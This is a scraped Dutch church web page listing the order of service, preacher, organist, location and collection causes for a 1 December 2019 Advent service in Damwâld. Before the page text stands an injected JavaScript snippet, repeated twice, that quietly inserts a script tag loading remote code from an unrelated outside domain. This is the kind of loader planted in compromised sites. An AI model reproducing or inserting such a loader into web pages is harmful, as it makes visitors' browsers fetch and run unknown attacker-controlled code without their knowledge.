;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 1 december 2019 14:00 uur - PKN Damwâld
zondag 1 december 2019
14:00 uur
1e Advent

Kerkdienst zondag 1 december 2019 14:00 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Jelte Cuperus
Mededeling:1e Advent
Liturgie
Lied voor de dienst Psalm 149 : 1 en 3
Welkom
We zingen: Gezang 127 : 1 en 4
Stil Gebed, Votum en Groet
We zingen: Gezang 117 : 1, 3 en 5
Geloofsbelijdenis Nicea- Constantinopel
We zingen: Psalm 89 : 8 en 9
Gebed
We lezen: Kol. 1:1-23
We zingen: Gezang 125 : 1 en 5
Preek .
We zingen: Elb 143
Dankzegging en voorbede
Collecte
We zingen: Elb 140 : 1 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Aidswezen in Zambia

Kinderen in de Knel - Aidswezen in Zambia
In Zambia zijn er wel 20.000 gezinnen, waar jongeren aan het hoofd staan omdat hun ouders overleden zijn aan aids. Deze kinderen hebben een zwaar bestaan. Ze staan er vaak alleen voor, omdat mensen bang zijn ook aids te krijgen. De Raad van Kerken in Zambia stimuleert kerken om naar deze kinderen om te kijken. Kerkleiders worden daarin getraind en kinderen praktisch ondersteund. Chisengo kreeg geld om een eigen bedrijfje te starten. Nu fokt ze varkens, die ze verkoopt in de grote stad. Het gezin kan weer drie keer per dag eten en haar broertjes en zusjes kunnen naar school.

Tweede collecte: Kerk
Uitganscollecte: Kerk